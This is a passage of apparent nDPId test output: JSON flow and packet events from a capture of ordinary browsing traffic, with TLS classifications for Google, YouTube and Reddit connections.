-00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4499,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605291688831,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688831,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+wAAAAAoAL9IM9TAAACBAWgBAIICkSadMcAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4537,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/oAAAAAoAL9IC3PAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291688843,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291688843,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4538,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605291688843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688843,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdYAAAAAoAL9IPghAAACBAWgBAIICjfz93gAAAAAAQMDBw=="} -00991{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":4539,"source":"reddit.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688749,"flow_last_seen":1605291688848,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688848,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2004","src_port":57282,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4815,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4xvp17E2f1af7oBJXgOZHAAACBAV4AQMDAwQCCArC10OnN\/P3eA=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4816,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688889,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgMAAAAAAAAIAMqAcsBIEmLB5kd7IUo3\/YpAbu4yD8lZERbpSHXoBJXgPP1AAACBAV4AQMDAwQCCArC10OmN\/P3eA=="} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4820,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gAjZHACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMYBu5\/Vp\/v6dexOgBAB+2orAAABAQgKN\/P3psLXQ6c="} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4821,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688889,"pkt":"qtsDr8lk5EKm5WPyht1gC3ZcACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIDAAAAAAAACADuMgBu1ulIdc\/JWRFgBAB+3fZAAABAQgKN\/P3psLXQ6Y="} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4826,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00953{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4827,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688843,"flow_last_seen":1605291688889,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688889,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4856,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605291688893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688893,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAEqAcsBIEmLB5kd7IUo3\/YpAbvjCkXQfikiqr+RoBJXgDd0AAACBAV4AQMDAwQCCArC10OZ7uBNkQ=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4858,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1605291688893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688893,"pkt":"qtsDr8lk5EKm5WPyht1gBrB0ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACAB4woBuyKqv5FF0H4qgBAB+7tFAAABAQgK7uBN0cLXQ5k="} -00945{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4861,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688830,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688894,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4865,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291688894,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgVAAAAAAAAIBYqAcsBIEmLB5kd7IUo3\/YpAbvMSCvRvaZMy7vtoBJXgIUlAAACBAV4AQMDAwQCCArC10OaRJp0xw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4867,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605291688894,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291688894,"pkt":"qtsDr8lk5EKm5WPyht1gDPOvACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFQAAAAAAACAWzEgBu0zLu+0r0b2ngBAB+wj4AAABAQgKRJp1BsLXQ5o="} -00943{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4885,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291688831,"flow_last_seen":1605291688895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291688895,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00986{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5588,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688830,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"yt3.ggpht.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00984{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5606,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688831,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.YouTube","breed":"Fun","category":"Media"},"tls": {"version":"TLSv1.3","client_requested_server_name":"i.ytimg.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47302,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00994{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5621,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291688843,"flow_last_seen":1605291688963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291688963,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"fonts.gstatic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291689408,"flow_last_seen":1605291689408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291689408,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7094,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605291689408,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689408,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYYAAAAAoAL9IMRnAAACBAWgBAIICql08xMAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7110,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605291689433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291689433,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleYwqAcsBIEmLB5kd7IUo3\/YpAbvdQHZ86cETj6GHoBJXgAFCAAACBAV4AQMDAwQCCArC10XLqXTzEw=="} -00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7111,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605291689433,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291689433,"pkt":"qtsDr8lk5EKm5WPyht1gCYSFACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXmM3UABuxOPoYd2fOnCgBAB+4U5AAABAQgKqXTzLcLXRcs="} -00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7112,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291689408,"flow_last_seen":1605291689434,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291689434,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01007{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8671,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291689408,"flow_last_seen":1605291689577,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291689577,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01277{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8678,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1605291689408,"flow_last_seen":1605291689578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":366,"midstream":0,"thread_ts_msec":1605291689578,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"gateway.reddit.com","server_names":"reddit.com,*.reddit.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Reddit Inc., CN=*.reddit.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:E9:D5:FE:EB:EF:68:34:55:FD:62:BA:C9:BB:04:D4:E3:22:18:81"}} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690373,"flow_last_seen":1605291690373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690373,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9080,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605291690373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690373,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2UAAAAAoAL9IFr7AAACBAWgBAIIClRf7UgAAAAAAQMDBw=="} -00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291690384,"flow_last_seen":1605291690384,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291690384,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2002","src_port":59336,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9081,"source":"reddit.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605291690384,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690384,"pkt":"qtsDr8lk5EKm5WPyht1gCvtsACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAC58gBu5uynDEAAAAAoAL9IAqWAAACBAWgBAIICgxmJysAAAAAAQMDBw=="} -00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9082,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291690396,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgFAAAAAAAAIAIqAcsBIEmLB5kd7IUo3\/YpAbvHPls7Xl4+krtmoBJXgDq4AAACBAV4AQMDAwQCCArC10mNVF\/tSA=="} -00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9083,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291690396,"pkt":"qtsDr8lk5EKm5WPyht1gB68TACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBQAAAAAAACACxz4Buz6Su2ZbO15fgBAB+76yAAABAQgKVF\/tX8LXSY0="} -00955{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9084,"source":"reddit.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291690373,"flow_last_seen":1605291690396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291690396,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2002","src_port":51006,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": 